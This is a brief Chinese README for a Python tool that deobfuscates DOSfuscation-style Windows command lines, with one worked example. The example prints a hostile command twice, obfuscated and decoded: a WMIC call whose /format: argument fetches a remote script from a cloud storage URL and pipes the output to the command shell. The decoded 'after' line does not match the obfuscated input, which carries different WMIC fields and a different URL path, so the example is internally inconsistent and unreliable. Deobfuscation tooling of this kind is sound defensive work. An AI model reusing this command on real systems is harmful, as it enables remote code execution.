python scripts
使用方式如下,xxx.txt
文件中,每行一条混淆命令,执行完成之后,在当前目录下生成xxx.txt.clear
文件,保存去混淆之后的命令。
python deDosfuscation.py xxx.txt
例如,去混淆前:
/V /C "set x=C77476dS66:\\77476dS66W77476dS66i77476dS66nd77476dS66ow77476dS66s\\s77476dS66ys77476dS66te77476dS66m377476dS66277476dS66\\77476dS66w77476dS66b77476dS66e77476dS66m\\W77476dS66M77476dS66I77476dS66C.e77476dS66x77476dS66e o77476dS66s g77476dS66e77476dS66t EF77476dS66Hn77476dS66xv77476dS66vhe77476dS66, las77476dS66t77476dS66b77476dS66o77476dS66o77476dS66t77476dS66u77476dS66pd77476dS66at77476dS66e /77476dS66fo77476dS66rm77476dS66at:"h77476dS66t77476dS66t77476dS66p77476dS66s77476dS66:77476dS66/77476dS66/st77476dS66or77476dS66ag77476dS66e.g77476dS66oog77476dS66l77476dS66e77476dS66a77476dS66p77476dS66i77476dS66s77476dS66.c77476dS66om77476dS66/a77476dS66wsd77476dS66x/077476dS66977476dS66/77476dS66v.77476dS66tx77476dS66t#77476dS660277476dS6650277476dS666k077476dS66W77476dS66I77476dS66J77476dS66b77476dS66z77476dS66477476dS66r" &&echo %x:77476dS66=%|%ComSpec%"
去混淆后:
/V /C "echo C:\\Windows\\system32\\wbem\\WMIC.exe os get t98dIFHrm, et8dWYH, numberofprocesses /format:https://storage.googleapis.com/ultramaker/08/v.txt#025015ed58iq24h|%ComSpec%"